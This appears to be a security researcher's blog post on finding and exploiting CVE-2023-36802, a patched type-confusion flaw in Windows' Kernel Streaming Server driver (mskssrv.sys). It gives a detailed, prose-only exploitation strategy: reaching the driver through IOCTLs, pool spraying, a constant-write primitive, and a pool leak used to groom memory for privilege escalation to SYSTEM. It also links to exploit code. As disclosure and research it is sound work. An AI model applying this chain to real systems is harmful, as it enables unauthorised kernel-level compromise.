Last month Microsoft patched a vulnerability in the Microsoft Kernel Streaming Server, a Windows kernel component used in the virtualization and sharing of camera devices. The vulnerability, CVE-2023-36802, allows a local attacker to escalate privileges to SYSTEM.
This blog post details my process of exploring a new attack surface in the Windows kernel, finding a 0-day vulnerability, exploring an interesting bug class, and building a stable exploit. This post doesn’t require any specialized Windows kernel knowledge to follow along, though a basic understanding of memory corruption and operating system concepts is helpful. I’ll also cover basics of performing initial analysis on an unfamiliar kernel driver and simplify the process of looking at a new target.
The attack surface
The Microsoft Kernel Streaming Server (mskssrv.sys) is a component of a Windows Multimedia Framework service, Frame Server. The service virtualizes the camera device and allows the device to be shared between multiple applications.
I began to explore this attack surface after noting CVE-2023-29360, which was initially listed as a TPM driver vulnerability. The bug is actually in the Microsoft Kernel Streaming Server. Though at the time I was unfamiliar with MS KS Server, the name of this driver was enough to hold my interest. Despite not knowing anything about the purpose or functionality, I thought a streaming server in the kernel could be a fruitful place to look for vulnerabilities. Going in blindly, I sought to answer the following questions:
- In what capacity can an unprivileged application interact with this kernel module?
- What type of data from the application does the module directly process?
To answer the first question, I started by analyzing the binary in a disassembler. I quickly identified the aforementioned vulnerability, a simple and elegant logic bug. The issue looked straightforward to trigger and fully exploit, so I sought out to develop a quick proof-of-concept to better understand the inner workings of the mskssrv.sys driver.
Triggering execution inside MS KS Server
First, we need to be able to reach the driver from a user space application. The vulnerable function is reachable from the driver’s DispatchDeviceControl routine, meaning it can be reached by issuing an IOCTL to the driver. To do that, a handle to the driver’s device needs to be obtained via a call to CreateFile using the device’s path. Typically, finding the device name/path is straightforward to identify: find a call to IoCreateDevice in the driver and examine the third parameter which contains the device name.
Function inside mskssrv.sys that calls IoCreateDevice with a NULL pointer for device name
In this case, the parameter for device name is NULL. The calling function name suggests mskssrv is a PnP driver, and the call to IoAttachDeviceToDeviceStack indicates the created device object is part of a device stack. In effect this means that multiple drivers are called when an I/O request is sent to a device. For PnP devices, the device interface path is needed in order to access the device.
Using WinDbg kernel debugger we can see what devices belong to the mskssrv driver and the device stack:
Output from !drvobj and !devobj commands showing upper and lower devices
Above we see mskssrv’s device is attached to the lower device object belonging to the swenum.sys driver and has an upper device attached belonging to ksthunk.sys.
From Device Manager we can find the target device instance ID:
Device Manager showing device instance ID and interface GUID
We now have enough information to get the device interface path using configuration manager or SetupApi functions. Using the retrieved device interface path, we can open a handle to the device.
Finally, we are now able to trigger code execution inside mskssrv.sys. When the device is created, the driver’s PnP dispatch create function is called. To trigger additional code execution, we can send IOCTLs to talk to the device which will execute in the driver’s dispatch device control function.
Debugging a ghost driver
When performing binary analysis, it is best practice to use a combination of static (disassembler, decompiler) and dynamic (debugger) tools. WinDbg can be used to kernel debug the target driver. By setting some breakpoints in places code execution is expected to happen (dispatch create, dispatch device control).
Starting out I had some difficulties – none of the breakpoints I set inside the driver were being hit. I had some doubts that I was opening the right device, or otherwise doing something else wrong. I later realized that my breakpoints were being unset because the driver was being unloaded. I searched the internet for answers, however there are not many results when searching for mskssrv, despite being loaded and accessible by default on Windows. Among the few results I found, was a thread on OSR, where someone else encountered a similar problem.
Words of encouragement from OSR poster
As it turns out, PnP filter drivers can be unloaded if they haven’t been used for a while, and loaded back on demand when needed.
I solved the issues I was having by setting breakpoints after a handle to the device was opened, but before calling DeviceIoControl, to ensure the driver was recently loaded in.
A quick survey of driver functionality
The mskssrv driver is only a 72KB sized binary and supports Device IO control codes that call into the following functions:
From looking at these symbol names we can infer some functionality of the driver, something dealing with transmitting and receiving streams. At this point I dug more into the driver’s intended functionality. I found this presentation by Michael Maltsev about Windows’ Multimedia framework where I gleaned that the driver is part of an inter-process mechanism to share camera streams.
Since the driver is not very large and there are not many IOCTLs, I could look at each function to get an idea of the internals of the driver. Each IOCTL function operates on either a context registration object or a stream registration object, which is allocated and initialized via their corresponding “Initialize” IOCTLs. The pointer to the object is stored Irp->CurrentStackLocation->FileObject->FsContext2. FileObject points to the device file object created per open file, and FsContext2 is a field intended to store per file object metadata.
I spotted this bug while trying to understand how to communicate with the driver directly, first foregoing the analysis of the usermode components, fsclient.dll and frameserver.dll. I almost missed the bug, because I assumed the developers instantiated a simple check that went overlooked. Let’s take a look at the PublishRx IOCTL function:
FSRendezvousServer::PublishRx decompilation snippet
After the stream object is retrieved from FsContext2, the function FSRendezvousServer::FindObject is called, to verify the pointer matches an object found in two lists stored by the global FSRendezvousServer. At first, I assumed this function would have some way of verifying the object type requested. However, the function returns TRUE if the pointer is found in either the list of context objects or the list of stream objects. Notice that no information about what type the object is supposed to be is passed to FindObject. That means a context object can be passed as a stream object. This is an object type confusion vulnerability! It occurs in every IOCTL function that operates on stream objects. To patch the vulnerability, Microsoft replaced FSRendezvousServer::FindObject with FSRendezvousServer::FindStreamObject, which first verifies the object is a stream object by checking a type field.
Because context registration objects are smaller than (0x78 bytes) stream registration objects (0x1D8 bytes), stream object operations can be performed on out of bounds memory:
Object type confusion vulnerability illustration
In order to leverage the vulnerability primitive, we need the ability to control the out of bounds memory that is accessed. This can be done by triggering the allocation of many objects in the same area of memory of the vulnerable object. This technique is called heap or pool spraying. The vulnerable object is allocated in a Non-Paged low fragmentation heap pool. We can use the classic technique by Alex Ionescu to spray buffers that give total control of memory contents below a 0x30 byte DATA_QUEUE_ENTRY header. By spraying using this technique, we can obtain the memory layout shown in the diagram:
NpFr Buffer Spraying Illustration
Using the chosen method of pool spraying, fields in object offsets within ranges 0xC0-0x10F and 0x150-0x19F can be controlled. I once again revisited the IOCTL functions for stream objects to look for exploit primitives. I searched for places in which the controllable object fields are accessed and manipulated.
I found a good constant write-where primitive in the PublishRx IOCTL. This primitive can be used to write a constant value at an arbitrary memory address. Let’s take a look at a snippet of the function FSStreamReg::PublishRx:
FSStreamReg::PublishRx decompilation snippet
The stream object contains a list head at offset 0x188 which describes a list of FSFrameMdl objects. In the decompilation snippet above, this list is iterated and if the tag value in the FSFrameMdl object matches the tag in the system buffer passed in from the application, the function FSFrameMdl::UnmapPages is called.
Using the aforementioned exploit primitive, the FSFrameMdlList and thus the FsFrameMdl object pointed to by pFrameMdl can be fully controlled. Let’s now looked at UnmapPages:
On the last line of the decompiled function above, the constant value 2 is being written to an offset value of this (FSFrameMdl object) which is controllable. This constant write can be used in conjunction with the I/O Ring technique to obtain arbitrary kernel read write and privilege escalation. You can read more about this technique works here and here.
Though I chose to utilize the constant write primitive, another useful exploit primitive also appears in this function. Both the arguments BaseAddress and MemoryDescriptorList to the call to MmUnmapLockedPages are controllable. This could be used to unmap a mapping at an arbitrary virtual address and construct a use-after-free like primitive.
The charge problem
At this point, several suitable exploit primitives that give arbitrary kernel read-write have been identified. You might have noticed there are several checks on the contents of the stream object that must be passed to trigger the desired code path. For the most part, the proper state of the object can be achieved via pool spraying. However, I encountered a problem that caused some difficulty. Below shows a code snippet of FSStreamReg::PublishRx after it is done looping through the FSFrameMdlList:
FSStreamReg::PublishRx decompilation snippet
In the decompilation above, bPagesUnmapped is a boolean variable that gets set if FSFrameMdl::UnmapPages is called. If so, then offset 0x1a8 of the stream object is retrieved and if not null, KeSetEvent is called on it.
This offset corresponds to out of bounds memory and points within a POOL_HEADER, the data structure that separates buffer allocations in the pool. In particular it points to the ProcessBilled field, which is used to store a pointer to the _EPROCESS object for process that is “charged” with the allocation. This is used to account for how many pool allocations a particular process can have. Not all pool allocations are “charged” against a process, and those that don’t have the ProcessBilled field set to NULL in the POOL_HEADER. In addition, the EPROCESS pointer stored in ProcessBilled is actually XOR’d with a random cookie, so ProcessBilled doesn’t contain a valid pointer.
This presents a difficulty, because NpFr buffers are charged to the calling process, and thus ProcessBilled is set. When triggering the needed exploit primitive, bPagesUnmapped will be set to TRUE. If an invalid pointer is passed to KeSetEvent, the system will crash. Therefore, it’s necessary to ensure that the POOL_HEADER is for a non-charged allocation. At this point, I noticed that the context registration (Creg) object itself is not charged. However, this object does not allow control over memory contents at the FSFrameMdl offset. So, both NpFr and Creg objects need to be sprayed they also need to be sequenced correctly.
Pool leak — No spray and pray!
Unlike big pool allocations, you can’t leak the addresses of LFH pool allocations via NtQuerySystemInformation. Additionally, allocation order is random. Therefore, there is no way of knowing if the adjacent buffers to the vulnerable object are in the correct order to both trigger the exploit primitive and avoid crashing the system. Fortunately, the vulnerability can be used to trigger a pool leak of the adjacent buffers. Let’s take a look at the IOCTL function for ConsumeTx:
FSRendezvousServer::ConsumeTx decompilation snippet
Above, the function FSStreamReg::GetStats is called:
Here, the out-of-bounds memory contents of the vulnerable stream object is copied into the SystemBuffer which is returned back to the calling user space application. This pool information leak primitive can be used to perform a signature check on buffers adjacent to the vulnerable object. A scan of many vulnerable objects can be performed until the object within the desired memory layout is located. Once the desired object is located, the memory layout is as follows:
CVE-2023-36802 Low-Fragmentation Heap Pool Groom Layout
Now, having located the target vulnerable object in the correct position in memory, the aforementioned exploit primitive on the target object can be triggered without crashing the system.
In the wild exploitation
After reporting the issue to MSRC, in the wild exploitation of the vulnerability was discovered.
The exploitation methods presented in this blog post are some of many approaches that could be taken. Presently, there is no public information about how attackers in the wild exploited this vulnerability. You can find exploit code here.
Retroactive patch analysis revealed that a large portion of new code was added to mskssrv.sys in the 1809 build of Windows 10. Monitoring for new code additions is often fruitful for finding vulnerabilities.
Another tired, but classic lesson to be learned from this analysis: don’t make assumptions about checks performed. A friend and colleague suggested that type confusion using FsContext2 could be a “common but under researched bug class”. I believe more variant analysis is warranted for this bug class, particularly in drivers that deal with inter-process communication.
The discovery of this vulnerability came about while simply trying to interface with an unfamiliar attack surface. Having “knowledge critically close to zero” of a system can also mean having the fresh mindset to break it.